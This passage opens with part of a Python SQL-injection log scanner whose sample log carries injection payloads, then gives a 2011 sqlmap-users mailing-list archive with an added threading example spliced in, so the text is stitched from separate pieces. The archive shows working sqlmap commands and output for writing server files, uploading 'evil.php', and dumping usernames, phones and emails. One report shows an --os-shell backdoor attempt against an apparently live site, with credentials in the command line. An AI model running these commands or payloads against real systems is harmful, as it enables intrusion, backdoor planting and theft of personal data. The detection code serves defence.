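    ("access-null-comment", re.compile(r"\x00\s*$")),
    ("access-system-table", re.compile(r"\bMSys(?:Objects|AccessXML|AccessObjects)\b", re.I)),
]

# Constructed log format: Apache common log fields followed by the raw request
# body in quotes ("-" when there is none), as a body-capturing LogFormat would emit.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\w+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+ '
    r'"(?P<body>[^"]*)"$'
)

def classify_value(value):
    """Return the names of all rules matching one decoded parameter value."""
    return [name for name, rx in RULES if rx.search(value)]

def extract_params(url, body):
    """Yield (location, name, decoded value) for query-string and body parameters."""
    for location, raw in (("GET", urlsplit(url).query), ("POST", body)):
        for name, value in parse_qsl(raw, keep_blank_values=True):
            yield location, name, value

def scan_request(url, body=""):
    """Map 'LOCATION:param' -> matched rule names for one request; {} if clean."""
    hits = {}
    for location, name, value in extract_params(url, body):
        matched = classify_value(value)
        if matched:
            hits[f"{location}:{name}"] = matched
    return hits

def parse_line(line):
    """Split one constructed log line into its fields, or None if malformed."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    if fields["body"] == "-":
        fields["body"] = ""
    return fields

def scan_log(lines):
    """Return one finding per log line whose parameters match at least one rule."""
    findings = []
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            continue
        hits = scan_request(fields["url"], fields["body"])
        if hits:
            findings.append({"client": fields["client"], "method": fields["method"],
                             "url": fields["url"], "hits": hits})
    return findings

def _line(client, method, path, body=None):
    """Build a constructed log line; body is a dict of POST fields or None."""
    raw_body = urlencode(body) if body else "-"
    return (f'{client} - - [06/Jul/2011:23:26:42 +0100] '
            f'"{method} {path} HTTP/1.1" 200 512 "{raw_body}"')

FORM = "/mutillidae/index.php?page=user-info.php"
SAMPLE_LOG = [
    # benign login against the same form as in the thread
    _line("10.0.0.5", "POST", FORM, {"view_user_name": "admin", "password": "adminpass"}),
    # time-based blind probe
    _line("10.0.0.5", "POST", FORM, {"view_user_name": "admin' AND SLEEP(5) AND 'BfoH'='BfoH"}),
    # UNION probe carrying sqlmap's CHAR(58,...) delimiters
    _line("10.0.0.5", "POST", FORM, {"view_user_name":
          "IZBb' UNION ALL SELECT NULL, CONCAT(CHAR(58,97,108,119,58),NULL), NULL, NULL#"}),
    # error-based probe (duplicate-key trick on FLOOR(RAND(0)*2))
    _line("10.0.0.5", "POST", FORM, {"view_user_name": "-3024' OR 1 GROUP BY CONCAT(CHAR(58,97,"
          "108,119,58),(SELECT 1),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)-- "}),
    # file-stager write through the injection (destination path constructed)
    _line("10.0.0.5", "POST", FORM, {"view_user_name":
          "admin' LIMIT 1 INTO OUTFILE '/var/www/test/tmpugbmo.php'-- "}),
    # MS Access style probe in a GET parameter, terminated with %00
    _line("10.0.0.9", "GET", "/app/view.asp?" + urlencode(
          {"id": "1' UNION SELECT NULL FROM MSysAccessObjects\x00"})),
]
```

Running `scan_log(SAMPLE_LOG)` reports five of the six constructed lines; the plain login produces no finding.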
From: <chr...@gm...> - 2011-07-06 22:46:20
Hi

Thanks. It turns out I was being an idiot. With absolute paths I didn't realise that this also includes the destination file name. With that included, it works like a dream.

What I haven't managed to get going properly yet is the --os-cmd flag. The temp stager file does appear, but is empty, 0KB. However, I think I'll save that one for another day!

Regards

Chris
------------------
-----Original Message-----
From: "Bernardo Damele A. G." <ber...@gm...>
Date: Wed, 6 Jul 2011 23:42:22
To: Chris Oakley<chr...@gm...>
Cc: <sql...@li...>
Subject: Re: [sqlmap-users] File Writing
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-06 22:42:32
|
Hi Chris,

To me it works well:

--8<--
$ python sqlmap.py -u "http://debian32/mutillidae/index.php?page=user-info.php" --forms -p view_user_name --risk 3 --level 3 --parse-errors --file-write /etc/passwd --file-dest /tmp/test --flush-session

    sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:26:35

[23:26:35] [INFO] setting file for logging HTTP traffic
[23:26:35] [INFO] testing connection to the target url
[23:26:35] [INFO] heuristics detected web page charset 'ascii'
[23:26:35] [INFO] searching for forms
[#1] form:
POST http://debian32:80/mutillidae/index.php?page=user-info.php
POST data: view_user_name=&password=&Submit_button=Submit
do you want to test this form? [Y/n/q]
>
Edit POST data [default: view_user_name=&password=&Submit_button=Submit] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n]
[23:26:37] [WARNING] the testable parameter 'view_user_name' you provided is not inside the GET
[23:26:37] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' as session file
[23:26:37] [INFO] flushing session file
[23:26:37] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' as results file
[23:26:37] [INFO] heuristics detected web page charset 'ascii'
[23:26:37] [INFO] testing if the url is stable, wait a few seconds
[23:26:38] [INFO] url is stable
[23:26:38] [INFO] heuristic test shows that POST parameter 'view_user_name' might be injectable (possible DBMS: MySQL)
[23:26:38] [INFO] testing sql injection on POST parameter 'view_user_name'
[23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)' injectable
[23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR error-based - WHERE or HAVING clause' injectable
[23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
[23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:26:43] [INFO] target url appears to be UNION injectable with 4 columns
[23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
[23:26:43] [WARNING] in OR boolean-based injections, please consider usage of switch --drop-set-cookie if you experience any problems during data retrieval
POST parameter 'view_user_name' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 148 HTTP(s) requests:
---
Place: POST
Parameter: view_user_name
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
    Payload: view_user_name=-5244' OR NOT (1884=1884)-- &password=bDXj&Submit_button=Submit

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: view_user_name=-3024' OR 1 GROUP BY CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1 ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)-- &password=bDXj&Submit_button=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: view_user_name=IZBb' UNION ALL SELECT NULL, CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84) AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL, NULL#&password=bDXj&Submit_button=Submit
---
do you want to exploit this SQL injection? [Y/n]
[23:26:46] [INFO] testing MySQL
[23:26:46] [INFO] confirming MySQL
[23:26:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[23:26:46] [INFO] fingerprinting the back-end DBMS operating system
[23:26:46] [INFO] the back-end DBMS operating system is Linux
[23:26:46] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
do you want confirmation that the file '/tmp/test' has been successfully written on the back-end DBMS file system? [Y/n]
[23:26:48] [INFO] the file has been successfully written and its size is 1848 bytes, but the size differs from the local file '/etc/passwd' (1845 bytes)
[23:26:48] [WARNING] expect junk characters inside the file as a leftover from UNION query
[23:26:48] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'

[*] shutting down at 23:26:48
--8<--

Cheers,
Bernardo

On 3 July 2011 18:03, Chris Oakley <chr...@gm...> wrote:
> Hi
>
> I'm playing with file writing. I have a full privs root user set up in
> mysql and am using
> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
> to play with. I've set up a /temp folder below the web root of the app.
> I've put a file "evil.php" in the sqlmap working directory. I've also
> changed the permissions for all users on the temp folder to write access
> allowed.
>
> I'm using the following input to try and upload this file:
>
> C:\Program Files\sqlmap-0.9>python sqlmap.py -u "http://localhost/mutillidae/index.php?page=user-info.php" --data "username=&password=&user-info-php-submit-button=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085" --file-write "evil.php" --file-dest "temp/evil.php"
>
> This is with the latest dev build by the way.
>
> The output I get is:
>
> [18:00:03] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.5, Apache 2.2.17
> back-end DBMS: MySQL 5.0
> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system
> [18:00:03] [INFO] the back-end DBMS operating system is Windows
> [18:00:04] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
> do you want confirmation that the file 'temp/evil.php' has been successfully written on the back-end DBMS file system? [Y/n]
> [18:00:12] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
> [18:00:12] [WARNING] expect junk characters inside the file as a leftover from UNION query
> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program Files\sqlmap-0.9\output\localhost'
>
> [*] shutting down at 18:00:12
>
> and sure enough the file isn't written. I've also tried using the --no-cast
> switch, to no avail.
>
> Does anyone have any ideas on what could be going wrong here? I can use the
> --file-read switch to read any file such as C:\boot.ini. The --os-cmd and
> --os-pwn commands also fail at the stager upload phase, probably for similar
> reasons.
>
> Any help would be appreciated
>
> Cheers
>
> Chris
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable |
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-06 21:15:29
|
Hi,

Update on IBM DB2 support: payload for time-based has been added[1] last week as well as support for direct connection (-d switch).

[1] https://twitter.com/#!/sqlmap/status/85659702565937152

On 25 June 2011 11:04, Bernardo Damele A. G. <ber...@gm...> wrote:
> Hi,
>
> The long awaited IBM DB2 support has been implemented in sqlmap. The
> patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH
> and merged in sqlmap repository after some tweaking by us. It is very
> stable for both DB2 8.x and 9.x branches.
> The patch includes support to fingerprint and enumerate data on IBM
> DB2 via boolean-based blind SQL injection and UNION query SQL
> injection. Hopefully, soon someone will come up with a payload for
> time-based and error-based techniques too. Support for direct
> connection to the DBMS (-d switch) will be implemented soon as well.
>
> Thank you Sebastian and the rest of the team at r-tec for your patch
> and support!
>
> Sample run against an IBM DB2 9.7 test environment:
> --8<--
> $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user
>
>     sqlmap/1.0-dev (r4182) - automatic SQL injection and database takeover tool
>     http://sqlmap.sourceforge.net
>
> [!] legal disclaimer: usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility
> to obey all applicable local, state and federal laws. Authors assume
> no liability and are not responsible for any misuse or damage caused
> by this program
>
> [*] starting at 10:56:21
>
> [10:56:21] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session' as session file
> [10:56:21] [INFO] testing connection to the target url
> [10:56:23] [INFO] heuristics detected web page charset 'ascii'
> [10:56:23] [INFO] testing if the url is stable, wait a few seconds
> [10:56:25] [INFO] url is stable
> [10:56:25] [INFO] testing if GET parameter 'id' is dynamic
> [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic
> [10:56:26] [INFO] GET parameter 'id' is dynamic
> [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: DB2)
> [10:56:27] [INFO] testing sql injection on GET parameter 'id'
> [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
> parsed error message(s) showed that the back-end DBMS could be DB2. Do you want to skip test payloads specific for other DBMSes? [Y/n]
> [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [10:56:49] [INFO] target url appears to be UNION injectable with 1 columns
> [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
> GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
> sqlmap identified the following injection points with a total of 21 HTTP(s) requests:
> ---
> Place: GET
> Parameter: id
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh
>
>     Type: UNION query
>     Title: Generic UNION query (NULL) - 1 to 10 columns
>     Payload: id=1' UNION ALL SELECT CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM
> ---
>
> [10:58:58] [INFO] testing IBM DB2
> [10:58:59] [INFO] confirming IBM DB2
> [10:59:12] [INFO] the back-end DBMS is IBM DB2
> web server operating system: Windows
> web application technology: PHP 5.3.5, Apache 2.2.17
> back-end DBMS: active fingerprint: IBM DB2 9.7
>                html error message fingerprint: DB2
> [10:59:12] [INFO] fetching banner
> banner:    'DB2 v9.7.400.501'
>
> [10:59:13] [INFO] fetching current user
> current user:    'TEST'
> --8<--
>
> Bernardo
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: Unavailable

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable |
From: Stiefenhofer, M. <M.S...@r-...> - 2011-07-05 22:08:53
|
Hi all,

Miroslav posted some news about an ongoing SQLi ModSecurity challenge. I was curious and had a quick look at it.

One of the vulnerable applications has an MS Access DB and can be UNION based injected. Unfortunately UNION based tests against MS Access will always fail with sqlmap, because for UNION based injections the defined comment string (queries.xml) is not respected. Access needs %00 as comment string and even this is not working in many cases. One quick fix would be adding special Access UNION test definitions to payload.xml like it has been done for MySQL.

Another problem is the defined SELECT_FROM for MS Access dbms, it's MSysObjects. In the ModSecurity challenge this system table has no read permissions hence any UNION test must fail. But the system table MSysAccessXML has read permissions in this specific case. Does anyone know which of the two tables is more likely to have read access in the wild? Does it make sense to change SELECT_FROM? Is MSysAccessXML present in older MS Access versions?

Hope some Access expert may help.

-marek |
From: Chris O. <chr...@gm...> - 2011-07-03 17:03:17
|
Hi

I'm playing with file writing. I have a full privs root user set up in mysql and am using http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 to play with. I've set up a /temp folder below the web root of the app. I've put a file "evil.php" in the sqlmap working directory. I've also changed the permissions for all users on the temp folder to write access allowed.

I'm using the following input to try and upload this file:

C:\Program Files\sqlmap-0.9>python sqlmap.py -u "http://localhost/mutillidae/index.php?page=user-info.php" --data "username=&password=&user-info-php-submit-button=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085" --file-write "evil.php" --file-dest "temp/evil.php"

This is with the latest dev build by the way.

The output I get is:

[18:00:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[18:00:03] [INFO] fingerprinting the back-end DBMS operating system
[18:00:03] [INFO] the back-end DBMS operating system is Windows
[18:00:04] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
do you want confirmation that the file 'temp/evil.php' has been successfully written on the back-end DBMS file system? [Y/n]
[18:00:12] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[18:00:12] [WARNING] expect junk characters inside the file as a leftover from UNION query
[18:00:12] [INFO] Fetched data logged to text files under 'C:\Program Files\sqlmap-0.9\output\localhost'

[*] shutting down at 18:00:12

and sure enough the file isn't written. I've also tried using the --no-cast switch, to no avail.

Does anyone have any ideas on what could be going wrong here? I can use the --file-read switch to read any file such as C:\boot.ini. The --os-cmd and --os-pwn commands also fail at the stager upload phase, probably for similar reasons.

Any help would be appreciated

Cheers

Chris |
From: Miroslav S. <mir...@gm...> - 2011-07-02 22:46:58
|
hi nightman.

thank you for your report and find it fixed in the latest commit.

kr

On Fri, Jul 1, 2011 at 4:51 PM, <nig...@em...> wrote:
> Hi,
>
> I have again a Problem with Dump. I run a Blind sql injection with revision 4208. I let sqlmap dumping the data from the DB and interrupt the dumping but the fetched data was only in the session file but not in a csv file. Sqlmap create the csv file only when it finished the dumping.
>
> greetz nightman
>

--
Miroslav Stampar (@stamparm)
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B |
From: Miroslav S. <mir...@gm...> - 2011-07-02 22:45:42
|
hi Phat.

thank you for your report and find it patched in the latest commit. there should now be a warning for this kind of situations (if no more threads are allowed than declared).

kr

On Sat, Jul 2, 2011 at 5:46 PM, Phat R. <pha...@gm...> wrote:
> Dear SQLMap developer
>
> I found the bug from SQLMap from 2 URLs in my company that are shown below
>
> ----------------------------------------------------------------------
> --=== RESULT FROM SERVER A to URL A ===--
>
> [00:05:04] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4203), retry
> your run with the latest development version from the Subversion repository.
> If the exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
>
> sqlmap version: 1.0-dev (r4203)
> Python version: 2.6.6
> Operating system: posix
> Command line: ./sqlmap.py -u **************************************************** --threads=10 --dump -C *********************** -T tb_register -D ****** -v 1 --random-agent
> Technique: BOOLEAN
> Back-end DBMS: Microsoft SQL Server (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 86, in main
>     start()
>   File "/home/tum/sqlmap-dev/lib/controller/controller.py", line 551, in start
>     action()
>   File "/home/tum/sqlmap-dev/lib/controller/action.py", line 109, in action
>     conf.dbmsHandler.dumpTable()
>   File "/home/tum/sqlmap-dev/plugins/generic/enumeration.py", line 1695, in dumpTable
>     retVal = self.__pivotDumpTable(table, colList, count, blind=True)
>   File "/home/tum/sqlmap-dev/plugins/generic/enumeration.py", line 1450, in __pivotDumpTable
>     value = inject.getValue(query, inband=False, error=False)
>   File "/home/tum/sqlmap-dev/lib/request/inject.py", line 456, in getValue
>     value = __goInferenceProxy(query, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar, dump)
>   File "/home/tum/sqlmap-dev/lib/request/inject.py", line 321, in __goInferenceProxy
>     outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
>   File "/home/tum/sqlmap-dev/lib/request/inject.py", line 102, in __goInferenceFields
>     output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump)
>   File "/home/tum/sqlmap-dev/lib/request/inject.py", line 66, in __goInference
>     count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump)
>   File "/home/tum/sqlmap-dev/lib/techniques/blind/inference.py", line 423, in bisection
>     thread.start()
>   File "/usr/lib/python2.6/threading.py", line 474, in start
>     _start_new_thread(self.__bootstrap, ())
> error: can't start new thread
>
> [*] shutting down at 00:05:04
>
> ----------------------------------------------------------------------
> --=== RESULT FROM SERVER B to URL B ===--
>
> [19:32:56] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4182), retry
> your run with the latest development version from the Subversion repository.
> If the exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
>
> sqlmap version: 1.0-dev (r4182)
> Python version: 2.5.2
> Operating system: posix
> Command line: ./sqlmap.py -u http://www.mysite.com/index.php?page=data&cmd=play&id=879 --dump -C username,telephone,email -T member -D webdev -v 1 --user-agent=IE 7.0 --threads=15
> Technique: BOOLEAN
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 86, in main
>     start()
>   File "/home/tum/SQL/sqlmap-dev/lib/controller/controller.py", line 551, in start
>     action()
>   File "/home/tum/SQL/sqlmap-dev/lib/controller/action.py", line 109, in action
>     conf.dbmsHandler.dumpTable()
>   File "/home/tum/SQL/sqlmap-dev/plugins/generic/enumeration.py", line 1723, in dumpTable
>     value = inject.getValue(query, inband=False, error=False, dump=True)
>   File "/home/tum/SQL/sqlmap-dev/lib/request/inject.py", line 456, in getValue
>     value = __goInferenceProxy(query, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar, dump)
>   File "/home/tum/SQL/sqlmap-dev/lib/request/inject.py", line 321, in __goInferenceProxy
>     outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
>   File "/home/tum/SQL/sqlmap-dev/lib/request/inject.py", line 102, in __goInferenceFields
>     output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump)
>   File "/home/tum/SQL/sqlmap-dev/lib/request/inject.py", line 66, in __goInference
>     count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump)
>   File "/home/tum/SQL/sqlmap-dev/lib/techniques/blind/inference.py", line 423, in bisection
>     thread.start()
>   File "/usr/lib/python2.5/threading.py", line 440, in start
>     _start_new_thread(self.__bootstrap, ())
> error: can't start new thread
>
> [*] shutting down at 19:32:57
>
> ----------------------------------------------------------------------
> Please see an attachment file for the server specification that run the
> sqlmap program
>
>
> --
> - Phatthanaphol R. -
>

--
Miroslav Stampar (@stamparm)
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B |
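Both tracebacks end in "error: can't start new thread": Thread.start() itself fails because the process or host will not hand out another thread, and the run dies instead of continuing with fewer workers. The following is an added example, not sqlmap code, of the handling Miroslav describes, in Python 3 (where the same failure surfaces as RuntimeError rather than the Python 2 thread.error shown above). The `start` hook, `simulated_thread_limit` and `parallel_sum` are constructed here so the degradation can be exercised without exhausting real OS threads.

```python
"""Bounded worker start-up that degrades instead of crashing.

Added example, not sqlmap code. It demonstrates the failure mode in the
"can't start new thread" tracebacks above and the fix-shape Miroslav
describes: keep the workers that did start, warn that fewer than requested
are running, and only abort when not even one worker could be started.
"""
import logging
import queue
import threading

log = logging.getLogger("workers")


def _real_start(thread: threading.Thread) -> None:
    thread.start()


def start_workers(target, requested: int, start=_real_start):
    """Start up to `requested` threads running `target`.

    `start` is a hook (constructed for this example) so the test can simulate
    the OS refusing thread creation; in real use the default Thread.start runs.
    Returns the list of threads that actually started.
    """
    if requested < 1:
        raise ValueError("requested must be >= 1")
    started = []
    for i in range(requested):
        t = threading.Thread(target=target, name=f"worker-{i}", daemon=True)
        try:
            start(t)
        except RuntimeError as exc:
            # Python 3: RuntimeError("can't start new thread"); Python 2 raised
            # thread.error with the same text (the error in the report).
            if not started:
                raise  # zero workers: nothing sensible to continue with
            log.warning("requested %d threads but only %d could be started (%s)",
                        requested, len(started), exc)
            break
        started.append(t)
    return started


def simulated_thread_limit(limit: int):
    """Constructed failure injector: lets `limit` threads start, then refuses
    every further start the way an exhausted thread table would."""
    count = 0

    def start(thread):
        nonlocal count
        if count >= limit:
            raise RuntimeError("can't start new thread")
        count += 1
        thread.start()
    return start


def parallel_sum(items, requested_threads: int, start=_real_start):
    """Sum `items` with a shared work queue drained by however many workers
    actually started; returns (total, number_of_workers_started)."""
    work = queue.Queue()
    for x in items:
        work.put(x)
    results = []
    lock = threading.Lock()

    def worker():
        while True:
            try:
                x = work.get_nowait()
            except queue.Empty:
                return
            with lock:
                results.append(x)

    threads = start_workers(worker, requested_threads, start)
    for t in threads:
        t.join()
    return sum(results), len(threads)


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    # Ten workers requested, only three allowed: the sum is still complete.
    print(parallel_sum(range(1000), 10, simulated_thread_limit(3)))
```

The queue-per-run shape matters: because every worker pulls from the same queue, the result is the same whether ten threads or three drain it, so starting fewer threads than declared costs time, not correctness.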
From: Phat R. <pha...@gm...> - 2011-07-02 15:46:14
|
-= CPU SPECIFICATION =-

Common to all eight processors:

vendor_id       : GenuineIntel
cpu family      : 6
model           : 15
model name      : Intel(R) Xeon(R) CPU E5345 @ 2.33GHz
stepping        : 7
cpu MHz         : 2327.587
cache size      : 4096 KB
siblings        : 4
cpu cores       : 4
fdiv_bug        : no
hlt_bug         : no
f00f_bug        : no
coma_bug        : no
fpu             : yes
fpu_exception   : yes
cpuid level     : 10
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr dca lahf_lm
clflush size    : 64
power management:

Per processor (initial apicid equals apicid throughout):

processor  physical id  core id  apicid  bogomips
0          0            0        0       4658.87
1          0            1        1       4655.01
2          0            2        2       4655.03
3          0            3        3       4655.04
4          1            0        4       4655.06
5          1            1        5       4655.05
6          1            2        6       4655.06
7          1            3        7       4655.06

------------------------------------------------------------------------

-= MEMORY =-

             total       used       free     shared    buffers     cached
Mem:       4148348    3988128     160220          0     176036    3595248
-/+ buffers/cache:     216844    3931504
Swap:      3903752      14836    3888916 |
From: <nig...@em...> - 2011-07-01 14:51:49
|
Hi,

I have again a problem with dump. I ran a blind SQL injection with revision 4208. I let sqlmap dump the data from the DB and interrupted the dumping, but the fetched data was only in the session file and not in a CSV file. Sqlmap creates the CSV file only when it has finished the dumping.

greetz nightman |
From: Miroslav S. <mir...@gm...> - 2011-06-29 17:47:16
hi nightman. thank you for your report and find it fixed in the latest commit. also, i've realized this moment that our "masking" logic for command line exceptions was broken for a month or two. sorry people. it should be fixed now (automatic masking of things like --auth-cred, -u... should be working just fine).

kr

On Wed, Jun 29, 2011 at 7:05 PM, <nig...@em...> wrote:
> I tried to upload the web backdoor with no knowledge of the web server document root. The result is a bug.
>
> [18:52:39] [INFO] heuristics detected web page charset 'ascii'
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: GET
> Parameter: n
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 OR time-based blind
> Payload: n=-5351' OR 1181=SLEEP(5) AND 'DBAH'='DBAH&vurl=http://website.com/content/video16/001Ccmg.avi&cmd=altern
> ---
>
> [18:52:39] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Fedora 5 (Bordeaux)
> web application technology: Apache 2.2.0, PHP 5.1.6
> back-end DBMS: MySQL 5
> [18:52:39] [INFO] going to use a web backdoor for command prompt
> [18:52:39] [INFO] fingerprinting the back-end DBMS operating system
> [18:52:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
> [18:52:47] [INFO] the back-end DBMS operating system is Linux
> [18:52:47] [INFO] trying to upload the file stager
> which web application language does the web server support?
> [1] ASP
> [2] ASPX
> [3] PHP (default)
> [4] JSP
> > 3
> [18:52:53] [WARNING] unable to retrieve the web server document root
> please provide the web server document root [/var/www/]:
> [18:55:06] [INFO] retrieved web server full paths: '/members/video.php'
> please provide any additional web server full path to try to upload the agent [Enter for None]:
> [18:55:15] [WARNING] HTTP error codes detected during testing:
> 403 (Forbidden) - 1 times
>
> [18:55:15] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4198), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sqlmap-users@lists.sourceforge.net the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4198)
> Python version: 2.7.1
> Operating system: nt
> Command line: C:\pentest\p\sqlmap.0.9-1\sqlmap.py -u http://website.com/members/video.php?n=769&vurl=********************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************** --auth-type=basic --auth-cred=mstier07:mstier --random-agent --retries=6 --level 5 --risk 3 --os-shell
> Technique: TIME
> Back-end DBMS: MySQL (fingerprinted)
